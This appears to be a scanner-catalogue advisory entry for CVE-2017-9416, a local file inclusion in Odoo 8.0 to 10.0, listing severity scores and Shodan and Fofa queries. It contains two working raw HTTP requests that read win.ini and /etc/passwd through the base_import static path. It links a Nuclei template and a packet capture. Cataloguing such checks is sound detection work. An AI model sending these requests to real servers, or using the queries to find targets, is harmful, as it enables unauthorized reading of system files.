| Title | Odoo 8.0/9.0/10.0 - Local File Inclusion |
|---|---|
| Author | Co5mos |
| Severity | Medium |
| Impact | Allows an attacker to read arbitrary files on the server. |
| Remediation | Upgrade to a patched version of Odoo or apply the necessary security patches. |
| CVSS Score | 6.5 |
| EPSS Score | 0.50415 |
| CVE ID | CVE-2017-9416 |
| CWE ID | CWE-22 |
| Shodan Query | cpe:"cpe:2.3:a:odoo:odoo"http.title:"odoo" |
| Fofa Query | title="odoo" |
| Tags | cve2017 cve odoo lfi vuln |
Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /base_import/static/c:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /base_import/static/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-9416.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-9416.pcap
N/AN/A